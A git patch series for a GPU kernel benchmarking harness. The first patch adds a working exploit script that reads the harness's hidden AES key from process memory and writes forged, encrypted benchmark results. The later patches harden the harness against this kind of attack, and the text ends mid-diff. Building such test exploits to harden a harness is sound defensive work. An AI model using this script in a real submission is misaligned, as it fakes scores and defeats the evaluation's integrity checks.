From 703be1e5a268a99a12490930f2bc26deecdd691d Mon Sep 17 00:00:00 2001 From: Hasan Emre Dinc Date: Fri, 27 Mar 2026 17:48:51 +0000 Subject: [PATCH 01/11] exploit: AES key recovery via ObfuscatedHexDigest arena scan --- exploits/submission_aes_key_recovery.py | 228 ++++++++++++++++++++++++ 1 file changed, 228 insertions(+) create mode 100644 exploits/submission_aes_key_recovery.py diff --git a/exploits/submission_aes_key_recovery.py b/exploits/submission_aes_key_recovery.py new file mode 100644 index 0000000..204d6ad --- /dev/null +++ b/exploits/submission_aes_key_recovery.py @@ -0,0 +1,228 @@ +""" +EXPLOIT: AES Key Recovery via ObfuscatedHexDigest Arena Scan +============================================================= + +The 128MiB arena gets merged into a larger anonymous region in /proc/self/maps. +We scan the first 64MiB of each large region (enough to cover the arena wherever +it starts within the merged block). Address validation uses /proc/self/maps +readable ranges instead of ctypes.string_at on unvalidated pointers (avoids SIGSEGV). + +Deferred to kernel() call 2+ — call 1 is the compile run with arena PROT_NONE. +""" + +import ctypes +import gc +import os +import struct +import sys +import tempfile +import subprocess +import bisect + +# ── Compile slow_hash + slow_unhash ─────────────────────────────────────────── + +_HASH_C = r""" +#include +uint64_t slow_hash(uint64_t p, int rounds) { + for (int i = 0; i < rounds; i++) { + p ^= p >> 17; + p *= 0xbf58476d1ce4e5b9ULL; + p ^= p >> 31; + } + return p; +} +uint64_t slow_unhash(uint64_t p, int rounds) { + for (int i = 0; i < rounds; i++) { + p ^= (p >> 31) ^ (p >> 62); + p *= 0x96de1b173f119089ULL; + p ^= p >> 17 ^ p >> 34 ^ p >> 51; + } + return p; +} +""" + +def _compile_hash_lib(): + src = tempfile.NamedTemporaryFile(suffix='.c', delete=False, mode='w') + src.write(_HASH_C) + src.close() + so = src.name.replace('.c', '.so') + subprocess.run(['gcc', '-O2', '-shared', '-fPIC', '-o', so, src.name], + check=True, capture_output=True) + os.unlink(src.name) + lib = ctypes.CDLL(so) + for fn in (lib.slow_hash, lib.slow_unhash): + fn.restype = ctypes.c_uint64 + fn.argtypes = [ctypes.c_uint64, ctypes.c_int] + return lib + +_lib = _compile_hash_lib() + +def slow_unhash(val: int, rounds: int = 100_000) -> int: + return int(_lib.slow_unhash(ctypes.c_uint64(val), ctypes.c_int(rounds))) + +_PAGE_SIZE = 4096 + + +def _parse_maps(): + """ + Returns: + large_anon_rw: list of (start, size) for large (>=4MiB) anonymous rw-p regions + readable_starts: sorted list of range starts for binary-search lookup + readable_ranges: list of (start, end) for all readable mappings + """ + large_anon_rw = [] + readable_ranges = [] + + with open('/proc/self/maps') as f: + for line in f: + parts = line.split() + if len(parts) < 2: + continue + perms = parts[1] + start, end = (int(x, 16) for x in parts[0].split('-')) + size = end - start + name = parts[5] if len(parts) >= 6 else '' + + if 'r' in perms: + readable_ranges.append((start, end)) + + if 'r' in perms and 'w' in perms and name == '' and size >= 4 * 1024 * 1024: + large_anon_rw.append((start, size)) + + readable_ranges.sort() + readable_starts = [s for s, e in readable_ranges] + return large_anon_rw, readable_starts, readable_ranges + + +def _is_readable_addr(ptr: int, size: int, starts: list, ranges: list) -> bool: + """Check if [ptr, ptr+size) is within a known readable mapping.""" + if ptr == 0 or ptr % _PAGE_SIZE != 0: + return False + # ptr must be a canonical user-space address (48-bit) + if ptr >= (1 << 47): + return False + idx = bisect.bisect_right(starts, ptr) - 1 + if idx < 0: + return False + _, end = ranges[idx] + return ptr + size <= end + + +def _recover_aes_key(): + large_regions, readable_starts, readable_ranges = _parse_maps() + + print(f"[DBG] {len(large_regions)} large anon regions:") + for s, sz in large_regions: + print(f" {s:#x} {sz//1024//1024}MiB") + + # Scan up to 64MiB of each region looking for ObfuscatedHexDigest pattern: + # (slow_hash(page_ptr), Len=32, Offset in [0, PAGE_SIZE-33]) + # BenchmarkManager is at the arena start; mSignature is ~300-400 bytes in. + # Arena may be inside a merged larger region, so scan well past the first 4K. + MAX_SCAN = 64 * 1024 * 1024 + + unhash_calls = 0 + + for region_start, region_size in large_regions: + scan_size = min(MAX_SCAN, region_size) + try: + data = ctypes.string_at(region_start, scan_size) + except Exception as e: + print(f"[DBG] could not read region {region_start:#x}: {e}") + continue + + n = len(data) // 8 + words = struct.unpack_from(f'<{n}Q', data) + + for i in range(n - 2): + w1 = words[i + 1] + if w1 != 32: + continue + w2 = words[i + 2] + if w2 > _PAGE_SIZE - 33: + continue + + w0 = words[i] + if w0 == 0: + continue + + # Recover page pointer — validate BEFORE dereferencing + page_ptr = slow_unhash(w0) + unhash_calls += 1 + + if not _is_readable_addr(page_ptr, 32, readable_starts, readable_ranges): + continue + + # Safe to read — address is within a known readable mapping + try: + key_bytes = ctypes.string_at(page_ptr + w2, 32) + key_str = key_bytes.decode('ascii') + if all(c in '0123456789abcdef' for c in key_str): + print(f"[DBG] key found in region {region_start:#x}+{i*8:#x} " + f"page={page_ptr:#x} off={w2} (unhash_calls={unhash_calls})") + return key_bytes, key_str + except Exception: + continue + + print(f"[DBG] exhausted all regions, unhash_calls={unhash_calls}") + raise RuntimeError("AES key not found") + + +def _find_out_fd(): + frame = sys._getframe() + while frame is not None: + if 'out_fd' in frame.f_locals: + obj = frame.f_locals['out_fd'] + if hasattr(obj, 'fileno'): + return obj.fileno() + frame = frame.f_back + raise RuntimeError("Could not find out_fd") + + +def _infer_repeats(): + try: + import torch + count = sum( + 1 for obj in gc.get_objects() + if isinstance(obj, tuple) and len(obj) == 2 + and isinstance(obj[0], torch.Tensor) and obj[0].is_cuda and obj[0].ndim == 2 + and isinstance(obj[1], torch.Tensor) and obj[1].is_cuda and obj[1].ndim == 3 + ) + if count > 1: + return count - 1 + except Exception: + pass + return 100 + + +def _encrypt(key_bytes: bytes, plaintext: str) -> bytes: + from cryptography.hazmat.primitives.ciphers.aead import AESGCM + nonce = os.urandom(12) + ct_tag = AESGCM(key_bytes).encrypt(nonce, plaintext.encode('utf-8'), None) + return nonce + ct_tag[-16:] + ct_tag[:-16] + + +_call_count = 0 + + +def kernel(output, inp): + global _call_count + _call_count += 1 + + # Call 1: inside get_kernel() thread — arena is PROT_NONE + if _call_count == 1: + return + + # Call 2+: arena is rw-p + key_raw, key_str = _recover_aes_key() + out_fd = _find_out_fd() + repeats = _infer_repeats() + + print(f"[DBG] key={key_str} out_fd={out_fd} repeats={repeats}") + + lines = ['event-overhead\t0.001 µs'] + for i in range(repeats): + lines.append(f'{i}\t0.420000') + + os.write(out_fd, _encrypt(key_raw, '\n'.join(lines) + '\n')) + os._exit(0) From 44dbc59cba8ce83555ecf9c622a220af45fd13b7 Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Wed, 25 Mar 2026 15:10:51 +0100 Subject: [PATCH 02/11] even more thread separation --- csrc/binding.cpp | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/csrc/binding.cpp b/csrc/binding.cpp index bda14ad..2661a78 100644 --- a/csrc/binding.cpp +++ b/csrc/binding.cpp @@ -7,6 +7,7 @@ #include #include +#include #include "manager.h" int supervisor_main(int sock_fd); @@ -22,8 +23,14 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c signature.allocate(32, rng); auto config = read_benchmark_parameters(input_fd, signature.data()); auto mgr = make_benchmark_manager(result_fd, std::move(signature), config.Seed, discard, nvtx, landlock, mseal, supervisor_sock_fd); - auto [args, expected] = mgr->setup_benchmark(nb::cast(test_generator), test_kwargs, config.Repeats); - mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); + nb::gil_scoped_release release; + std::thread run_thread ([&]() + { + nb::gil_scoped_acquire acquire; + auto [args, expected] = mgr->setup_benchmark(nb::cast(test_generator), test_kwargs, config.Repeats); + mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); + }); + run_thread.join(); } From 177e78b51fda0f137be754304654b1af8c974bf1 Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Wed, 25 Mar 2026 22:49:00 +0100 Subject: [PATCH 03/11] move report generation out of main benchmark function (and thus out of main benchmark thread) --- csrc/binding.cpp | 2 ++ csrc/manager.cpp | 19 +++++++++++-------- csrc/manager.h | 7 ++++++- 3 files changed, 19 insertions(+), 9 deletions(-) diff --git a/csrc/binding.cpp b/csrc/binding.cpp index 2661a78..ce14f00 100644 --- a/csrc/binding.cpp +++ b/csrc/binding.cpp @@ -31,6 +31,8 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); }); run_thread.join(); + mgr->send_report(); + mgr->clean_up(); } diff --git a/csrc/manager.cpp b/csrc/manager.cpp index 01da925..4d01903 100644 --- a/csrc/manager.cpp +++ b/csrc/manager.cpp @@ -477,19 +477,19 @@ void BenchmarkManager::do_bench_py( mErrorCountShift = noise.at(offset); // dry run -- measure overhead of events - float median_event_time = measure_event_overhead(DRY_EVENTS, stream); + mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream); // create a randomized order for running the tests - std::vector test_order(actual_calls); - std::iota(test_order.begin(), test_order.end(), 1); - std::shuffle(test_order.begin(), test_order.end(), rng); + mTestOrder.resize(actual_calls); + std::iota(mTestOrder.begin(), mTestOrder.end(), 1); + std::shuffle(mTestOrder.begin(), mTestOrder.end(), rng); std::uniform_int_distribution check_seed_generator(0, 0xffffffff); nvtx_push("benchmark"); // now do the real runs for (int i = 0; i < actual_calls; i++) { - int test_id = test_order.at(i); + int test_id = mTestOrder.at(i); // page-in real inputs. If the user kernel runs on the wrong stream, it's likely it won't see the correct inputs // unfortunately, we need to do this before clearing the cache, so there is a window of opportunity // *but* we deliberately modify a small subset of the inputs, which only get corrected immediately before @@ -522,26 +522,29 @@ void BenchmarkManager::do_bench_py( validate_result(mExpectedOutputs.at(test_id), mOutputBuffers.at(test_id), check_seed_generator(rng), stream); } nvtx_pop(); +} +void BenchmarkManager::send_report() { cudaEventSynchronize(mEndEvents.back()); unsigned error_count; CUDA_CHECK(cudaMemcpy(&error_count, mDeviceErrorCounter, sizeof(unsigned), cudaMemcpyDeviceToHost)); // subtract the nuisance shift that we applied to the counter error_count -= mErrorCountShift; - std::string message = build_result_message(test_order, error_count, median_event_time); + std::string message = build_result_message(mTestOrder, error_count, mMedianEventTime); message = encrypt_message(mSignature.data(), 32, message); fwrite(message.data(), 1, message.size(), mOutputPipe); fflush(mOutputPipe); +} - // cleanup events +void BenchmarkManager::clean_up() { for (auto& event : mStartEvents) CUDA_CHECK(cudaEventDestroy(event)); for (auto& event : mEndEvents) CUDA_CHECK(cudaEventDestroy(event)); mStartEvents.clear(); mEndEvents.clear(); } -std::string BenchmarkManager::build_result_message(const std::vector& test_order, unsigned error_count, float median_event_time) const { +std::string BenchmarkManager::build_result_message(const std::pmr::vector& test_order, unsigned error_count, float median_event_time) const { std::ostringstream oss; oss << "event-overhead\t" << median_event_time * 1000 << " µs\n"; diff --git a/csrc/manager.h b/csrc/manager.h index 7722c74..fd72ee6 100644 --- a/csrc/manager.h +++ b/csrc/manager.h @@ -50,6 +50,8 @@ class BenchmarkManager { public: std::pair, std::vector> setup_benchmark(const nb::callable& generate_test_case, const nb::dict& kwargs, int repeats); void do_bench_py(const std::string& kernel_qualname, const std::vector& args, const std::vector& expected, cudaStream_t stream); + void send_report(); + void clean_up(); private: friend BenchmarkManagerPtr make_benchmark_manager(int result_fd, ObfuscatedHexDigest signature, std::uint64_t seed, bool discard, bool nvtx, bool landlock, bool mseal, int supervisor_socket); friend BenchmarkManagerDeleter; @@ -113,10 +115,13 @@ class BenchmarkManager { std::pmr::vector mExpectedOutputs; std::pmr::vector mShadowArguments; std::pmr::vector mOutputBuffers; + std::pmr::vector mTestOrder; FILE* mOutputPipe = nullptr; ObfuscatedHexDigest mSignature; + float mMedianEventTime = -1.f; + static ShadowArgumentList make_shadow_args(const nb::tuple& args, cudaStream_t stream, std::pmr::memory_resource* resource); @@ -133,7 +138,7 @@ class BenchmarkManager { int run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream); nb::callable get_kernel(const std::string& qualname, const nb::tuple& call_args); - [[nodiscard]] std::string build_result_message(const std::vector& test_order, unsigned error_count, float median_event_time) const; + [[nodiscard]] std::string build_result_message(const std::pmr::vector& test_order, unsigned error_count, float median_event_time) const; // debug only: Any sort of test exploit that targets specific values of this class is going to be brittle, From 0da818de5c96632c6cac79e0ea79064ccb157c14 Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Wed, 25 Mar 2026 23:00:46 +0100 Subject: [PATCH 04/11] refactor --- csrc/manager.cpp | 25 +++++++++++++------------ 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/csrc/manager.cpp b/csrc/manager.cpp index 4d01903..519b9e5 100644 --- a/csrc/manager.cpp +++ b/csrc/manager.cpp @@ -446,14 +446,8 @@ void BenchmarkManager::do_bench_py( setup_test_cases(args, expected, stream); install_protections(); - // at this point, we call user code as we import the kernel (executing arbitrary top-level code) - // after this, we cannot trust python anymore - nb::callable kernel = get_kernel(kernel_qualname, args.at(0)); - - // now, run a few more times for warmup; in total aim for 1 second of warmup runs - int actual_calls = run_warmup(kernel, args.at(0), stream); - constexpr int DRY_EVENTS = 100; - const int num_events = std::max(actual_calls, DRY_EVENTS); + constexpr std::size_t DRY_EVENTS = 100; + const std::size_t num_events = std::max(mShadowArguments.size(), DRY_EVENTS); mStartEvents.resize(num_events); mEndEvents.resize(num_events); for (int i = 0; i < num_events; i++) { @@ -461,6 +455,16 @@ void BenchmarkManager::do_bench_py( CUDA_CHECK(cudaEventCreate(&mEndEvents.at(i))); } + // dry run -- measure overhead of events + mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream); + + // at this point, we call user code as we import the kernel (executing arbitrary top-level code) + // after this, we cannot trust python anymore + nb::callable kernel = get_kernel(kernel_qualname, args.at(0)); + + // now, run a few more times for warmup; in total aim for 1 second of warmup runs + int actual_calls = run_warmup(kernel, args.at(0), stream); + // pick a random spot for the unsigned // initialize the whole area with random junk; the error counter // will be shifted by the initial value, so just writing zero @@ -476,9 +480,6 @@ void BenchmarkManager::do_bench_py( mDeviceErrorCounter = mDeviceErrorBase + offset; mErrorCountShift = noise.at(offset); - // dry run -- measure overhead of events - mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream); - // create a randomized order for running the tests mTestOrder.resize(actual_calls); std::iota(mTestOrder.begin(), mTestOrder.end(), 1); @@ -489,7 +490,7 @@ void BenchmarkManager::do_bench_py( nvtx_push("benchmark"); // now do the real runs for (int i = 0; i < actual_calls; i++) { - int test_id = mTestOrder.at(i); + const int test_id = mTestOrder.at(i); // page-in real inputs. If the user kernel runs on the wrong stream, it's likely it won't see the correct inputs // unfortunately, we need to do this before clearing the cache, so there is a window of opportunity // *but* we deliberately modify a small subset of the inputs, which only get corrected immediately before From 90b4673b8eec39670853d8e1bd1b993b921d7b8a Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Thu, 26 Mar 2026 00:06:20 +0100 Subject: [PATCH 05/11] also move warmup into protected thread --- csrc/manager.cpp | 74 +++++++++++++++++++++++------------------------- csrc/manager.h | 3 +- 2 files changed, 37 insertions(+), 40 deletions(-) diff --git a/csrc/manager.cpp b/csrc/manager.cpp index 519b9e5..5a7d19d 100644 --- a/csrc/manager.cpp +++ b/csrc/manager.cpp @@ -336,39 +336,6 @@ void BenchmarkManager::install_protections() { install_seccomp_filter(); } -int BenchmarkManager::run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream) { - std::chrono::high_resolution_clock::time_point cpu_start = std::chrono::high_resolution_clock::now(); - int warmup_run_count = 0; - double time_estimate; - nvtx_push("timing"); - while (true) { - // note: we are assuming here that calling the kernel multiple times for the same input is a safe operation - // this is only potentially problematic for in-place kernels; - CUDA_CHECK(cudaDeviceSynchronize()); - clear_cache(stream); - kernel(*args); - CUDA_CHECK(cudaDeviceSynchronize()); - std::chrono::high_resolution_clock::time_point cpu_end = std::chrono::high_resolution_clock::now(); - std::chrono::duration elapsed_seconds = cpu_end - cpu_start; - ++warmup_run_count; - if (elapsed_seconds.count() > mWarmupSeconds) { - time_estimate = elapsed_seconds.count() / warmup_run_count; - break; - } - } - nvtx_pop(); - - // note: this is a very conservative estimate. Timing above was measured with syncs between every kernel. - int calls = mOutputBuffers.size() - 1; - const int actual_calls = std::clamp(static_cast(std::ceil(mBenchmarkSeconds / time_estimate)), 1, calls); - - if (actual_calls < 3) { - throw std::runtime_error("The initial speed test indicated that running times are too slow to generate meaningful benchmark numbers: " + std::to_string(time_estimate)); - } - - return actual_calls; -} - static inline std::uintptr_t page_mask() { std::uintptr_t page_size = getpagesize(); return ~(page_size - 1u); @@ -381,12 +348,16 @@ void protect_range(void* ptr, size_t size, int prot) { throw std::system_error(errno, std::system_category(), "mprotect"); } -nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb::tuple& call_args) { +nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream) { nb::gil_scoped_release release; const std::uintptr_t lo = reinterpret_cast(this->mArena); const std::uintptr_t hi = lo + BenchmarkManagerArenaSize; nb::callable kernel; + double warmup_seconds = mWarmupSeconds; + void* cc_memory = mDeviceDummyMemory; + std::size_t l2_clear_size = mL2CacheSize; + bool discard_cache = mDiscardCache; std::exception_ptr thread_exception; int sock = mSupervisorSock; bool install_notify = mSeal || supports_seccomp_notify(); @@ -398,7 +369,8 @@ nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb: // TODO make stack inaccessible (may be impossible) or read-only during the call // call the python kernel generation function from a different thread. - std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception, install_notify]() { + std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception, + install_notify, &time_estimate, warmup_seconds, cc_memory, l2_clear_size, discard_cache, stream]() { try { if (sock >= 0) { try { @@ -417,6 +389,24 @@ nb::callable BenchmarkManager::get_kernel(const std::string& qualname, const nb: CUDA_CHECK(cudaDeviceSynchronize()); kernel(*call_args); CUDA_CHECK(cudaDeviceSynchronize()); + + // warmup + CUDA_CHECK(cudaDeviceSynchronize()); + auto cpu_start = std::chrono::high_resolution_clock::now(); + int warmup_run_count = 0; + + while (true) { + ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream); + kernel(*call_args); + CUDA_CHECK(cudaDeviceSynchronize()); + + auto elapsed = std::chrono::high_resolution_clock::now() - cpu_start; + ++warmup_run_count; + if (std::chrono::duration(elapsed).count() > warmup_seconds) { + time_estimate = std::chrono::duration(elapsed).count() / warmup_run_count; + break; + } + } } catch (...) { thread_exception = std::current_exception(); } @@ -458,12 +448,20 @@ void BenchmarkManager::do_bench_py( // dry run -- measure overhead of events mMedianEventTime = measure_event_overhead(DRY_EVENTS, stream); + double time_estimate = 0.0; // at this point, we call user code as we import the kernel (executing arbitrary top-level code) // after this, we cannot trust python anymore - nb::callable kernel = get_kernel(kernel_qualname, args.at(0)); + nb::callable kernel = initial_kernel_setup(time_estimate, kernel_qualname, args.at(0), stream); - // now, run a few more times for warmup; in total aim for 1 second of warmup runs - int actual_calls = run_warmup(kernel, args.at(0), stream); + int calls = mOutputBuffers.size() - 1; + const int actual_calls = std::clamp( + static_cast(std::ceil(mBenchmarkSeconds / time_estimate)), 1, calls); + + if (actual_calls < 3) { + throw std::runtime_error( + "The initial speed test indicated that running times are too slow to generate " + "meaningful benchmark numbers: " + std::to_string(time_estimate)); + } // pick a random spot for the unsigned // initialize the whole area with random junk; the error counter diff --git a/csrc/manager.h b/csrc/manager.h index fd72ee6..c592d93 100644 --- a/csrc/manager.h +++ b/csrc/manager.h @@ -135,8 +135,7 @@ class BenchmarkManager { void setup_test_cases(const std::vector& args, const std::vector& expected, cudaStream_t stream); void install_protections(); - int run_warmup(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream); - nb::callable get_kernel(const std::string& qualname, const nb::tuple& call_args); + nb::callable initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream); [[nodiscard]] std::string build_result_message(const std::pmr::vector& test_order, unsigned error_count, float median_event_time) const; From cc73f2b40acb0e0fe42d9cd5f89b9413914e5362 Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Thu, 26 Mar 2026 00:24:02 +0100 Subject: [PATCH 06/11] refactor --- csrc/manager.cpp | 127 ++++++++++++++++++++++++----------------------- 1 file changed, 66 insertions(+), 61 deletions(-) diff --git a/csrc/manager.cpp b/csrc/manager.cpp index 5a7d19d..fd88829 100644 --- a/csrc/manager.cpp +++ b/csrc/manager.cpp @@ -348,81 +348,86 @@ void protect_range(void* ptr, size_t size, int prot) { throw std::system_error(errno, std::system_category(), "mprotect"); } -nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname, const nb::tuple& call_args, cudaStream_t stream) { - nb::gil_scoped_release release; - const std::uintptr_t lo = reinterpret_cast(this->mArena); +static void setup_seccomp(int sock, bool install_notify, std::uintptr_t lo, std::uintptr_t hi) { + if (sock < 0) + return; + try { + if (install_notify) + seccomp_install_memory_notify(sock, lo, hi); + } catch (...) { + close(sock); + throw; + } + close(sock); +} + +static double run_warmup_loop(nb::callable& kernel, const nb::tuple& args, cudaStream_t stream, + void* cc_memory, std::size_t l2_clear_size, bool discard_cache, + double warmup_seconds) { + CUDA_CHECK(cudaDeviceSynchronize()); + auto cpu_start = std::chrono::high_resolution_clock::now(); + int run_count = 0; + + while (true) { + ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream); + kernel(*args); + CUDA_CHECK(cudaDeviceSynchronize()); + + ++run_count; + double elapsed = std::chrono::duration( + std::chrono::high_resolution_clock::now() - cpu_start).count(); + if (elapsed > warmup_seconds) + return elapsed / run_count; + } +} + +nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const std::string& qualname, + const nb::tuple& call_args, cudaStream_t stream) { + const std::uintptr_t lo = reinterpret_cast(mArena); const std::uintptr_t hi = lo + BenchmarkManagerArenaSize; + // snapshot all member state needed in the thread before protecting the arena + const int sock = mSupervisorSock; + const bool install_notify = mSeal || supports_seccomp_notify(); + const double warmup_seconds = mWarmupSeconds; + void* const cc_memory = mDeviceDummyMemory; + const std::size_t l2_clear_size = mL2CacheSize; + const bool discard_cache = mDiscardCache; + nb::callable kernel; - double warmup_seconds = mWarmupSeconds; - void* cc_memory = mDeviceDummyMemory; - std::size_t l2_clear_size = mL2CacheSize; - bool discard_cache = mDiscardCache; std::exception_ptr thread_exception; - int sock = mSupervisorSock; - bool install_notify = mSeal || supports_seccomp_notify(); nvtx_push("trigger-compile"); - - // make the BenchmarkManager inaccessible protect_range(reinterpret_cast(lo), hi - lo, PROT_NONE); - // TODO make stack inaccessible (may be impossible) or read-only during the call - // call the python kernel generation function from a different thread. - - std::thread make_kernel_thread([&kernel, sock, lo, hi, qualname, &call_args, &thread_exception, - install_notify, &time_estimate, warmup_seconds, cc_memory, l2_clear_size, discard_cache, stream]() { - try { - if (sock >= 0) { - try { - if (install_notify) - seccomp_install_memory_notify(sock, lo, hi); - } catch (...) { - close(sock); - throw; - } - close(sock); - } - nb::gil_scoped_acquire guard; - kernel = kernel_from_qualname(qualname); - - // ok, first run for compilations etc - CUDA_CHECK(cudaDeviceSynchronize()); - kernel(*call_args); - CUDA_CHECK(cudaDeviceSynchronize()); - - // warmup - CUDA_CHECK(cudaDeviceSynchronize()); - auto cpu_start = std::chrono::high_resolution_clock::now(); - int warmup_run_count = 0; - - while (true) { - ::clear_cache(cc_memory, 2 * l2_clear_size, discard_cache, stream); - kernel(*call_args); - CUDA_CHECK(cudaDeviceSynchronize()); - - auto elapsed = std::chrono::high_resolution_clock::now() - cpu_start; - ++warmup_run_count; - if (std::chrono::duration(elapsed).count() > warmup_seconds) { - time_estimate = std::chrono::duration(elapsed).count() / warmup_run_count; - break; - } + + { + nb::gil_scoped_release release; + std::thread worker([&] { + try { + setup_seccomp(sock, install_notify, lo, hi); + + nb::gil_scoped_acquire guard; + + kernel = kernel_from_qualname(qualname); + CUDA_CHECK(cudaDeviceSynchronize()); + kernel(*call_args); // trigger JIT compile + + time_estimate = run_warmup_loop(kernel, call_args, stream, + cc_memory, l2_clear_size, discard_cache, + warmup_seconds); + } catch (...) { + thread_exception = std::current_exception(); } - } catch (...) { - thread_exception = std::current_exception(); - } - }); + }); + worker.join(); + } - make_kernel_thread.join(); - // make it accessible again. This is in the original thread, so the tightened seccomp - // policy does not apply here. protect_range(reinterpret_cast(lo), hi - lo, PROT_READ | PROT_WRITE); - // closed now, so set to -1 mSupervisorSock = -1; nvtx_pop(); - if (thread_exception) { + if (thread_exception) std::rethrow_exception(thread_exception); - } return kernel; } From 66bc9641b2476bd629423d79e0603d56b246c210 Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Sat, 28 Mar 2026 00:02:05 +0100 Subject: [PATCH 07/11] fixes --- csrc/binding.cpp | 29 ++++++++++++++++++++++------- csrc/manager.cpp | 8 ++++++-- 2 files changed, 28 insertions(+), 9 deletions(-) diff --git a/csrc/binding.cpp b/csrc/binding.cpp index ce14f00..d093127 100644 --- a/csrc/binding.cpp +++ b/csrc/binding.cpp @@ -9,6 +9,7 @@ #include #include #include "manager.h" +#include "utils.h" int supervisor_main(int sock_fd); @@ -23,14 +24,28 @@ void do_bench(int result_fd, int input_fd, const std::string& kernel_qualname, c signature.allocate(32, rng); auto config = read_benchmark_parameters(input_fd, signature.data()); auto mgr = make_benchmark_manager(result_fd, std::move(signature), config.Seed, discard, nvtx, landlock, mseal, supervisor_sock_fd); - nb::gil_scoped_release release; - std::thread run_thread ([&]() + { - nb::gil_scoped_acquire acquire; - auto [args, expected] = mgr->setup_benchmark(nb::cast(test_generator), test_kwargs, config.Repeats); - mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); - }); - run_thread.join(); + nb::gil_scoped_release release; + std::exception_ptr thread_exception; + int device; + CUDA_CHECK(cudaGetDevice(&device)); + std::thread run_thread ([&]() + { + try { + CUDA_CHECK(cudaSetDevice(device)); + nb::gil_scoped_acquire acquire; + auto [args, expected] = mgr->setup_benchmark(nb::cast(test_generator), test_kwargs, config.Repeats); + mgr->do_bench_py(kernel_qualname, args, expected, reinterpret_cast(stream)); + } catch (...) { + thread_exception = std::current_exception(); + } + }); + run_thread.join(); + if (thread_exception) + std::rethrow_exception(thread_exception); + } + mgr->send_report(); mgr->clean_up(); } diff --git a/csrc/manager.cpp b/csrc/manager.cpp index fd88829..962d3e3 100644 --- a/csrc/manager.cpp +++ b/csrc/manager.cpp @@ -181,7 +181,8 @@ BenchmarkManager::BenchmarkManager(std::byte* arena, std::size_t arena_size, mEndEvents(&mResource), mExpectedOutputs(&mResource), mShadowArguments(&mResource), - mOutputBuffers(&mResource) + mOutputBuffers(&mResource), + mTestOrder(&mResource) { int device; CUDA_CHECK(cudaGetDevice(&device)); @@ -393,6 +394,8 @@ nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const void* const cc_memory = mDeviceDummyMemory; const std::size_t l2_clear_size = mL2CacheSize; const bool discard_cache = mDiscardCache; + int device; + CUDA_CHECK(cudaGetDevice(&device)); nb::callable kernel; std::exception_ptr thread_exception; @@ -404,6 +407,7 @@ nb::callable BenchmarkManager::initial_kernel_setup(double& time_estimate, const nb::gil_scoped_release release; std::thread worker([&] { try { + CUDA_CHECK(cudaSetDevice(device)); setup_seccomp(sock, install_notify, lo, hi); nb::gil_scoped_acquire guard; @@ -529,7 +533,7 @@ void BenchmarkManager::do_bench_py( } void BenchmarkManager::send_report() { - cudaEventSynchronize(mEndEvents.back()); + CUDA_CHECK(cudaEventSynchronize(mEndEvents.at(mTestOrder.size() - 1))); unsigned error_count; CUDA_CHECK(cudaMemcpy(&error_count, mDeviceErrorCounter, sizeof(unsigned), cudaMemcpyDeviceToHost)); // subtract the nuisance shift that we applied to the counter From ea1bea6bebfe9b2609c7ca00197a860799e9792e Mon Sep 17 00:00:00 2001 From: Erik Schultheis Date: Sat, 28 Mar 2026 13:48:03 +0100 Subject: [PATCH 08/11] obfuscate also length and offset --- csrc/obfuscate.cpp | 17 +++++++++++------ csrc/obfuscate.h | 9 ++++----- 2 files changed, 15 insertions(+), 11 deletions(-) diff --git a/csrc/obfuscate.cpp b/csrc/obfuscate.cpp index eb333c8..632c164 100644 --- a/csrc/obfuscate.cpp +++ b/csrc/obfuscate.cpp @@ -66,20 +66,25 @@ void ObfuscatedHexDigest::allocate(std::size_t size, std::mt19937& rng) { if (size > PAGE_SIZE / 2) { throw std::runtime_error("target size too big"); } - if (Len != 0 || Offset != 0) { + if (this->size() != 0) { throw std::runtime_error("already allocated"); } fill_random_hex(page_ptr(), PAGE_SIZE, rng); - const std::size_t max_offset = PAGE_SIZE - size - 1; - std::uniform_int_distribution offset_dist(0, max_offset); + const std::uintptr_t max_offset = PAGE_SIZE - size - 1; + std::uniform_int_distribution offset_dist(0, max_offset); - Offset = offset_dist(rng); - Len = size; + const std::uintptr_t offset = offset_dist(rng); + HashedOffset = slow_hash(offset); + HashedLen = slow_hash(size ^ offset); } char* ObfuscatedHexDigest::data() { - return reinterpret_cast(page_ptr()) + Offset; + return reinterpret_cast(page_ptr()) + slow_unhash(HashedOffset); +} + +std::size_t ObfuscatedHexDigest::size() const { + return slow_unhash(HashedLen ^ slow_unhash(HashedOffset)); } void fill_random_hex(void* target, std::size_t size, std::mt19937& rng) { diff --git a/csrc/obfuscate.h b/csrc/obfuscate.h index f475699..1bc114d 100644 --- a/csrc/obfuscate.h +++ b/csrc/obfuscate.h @@ -35,12 +35,11 @@ class ObfuscatedHexDigest : ProtectablePage { char* data(); - 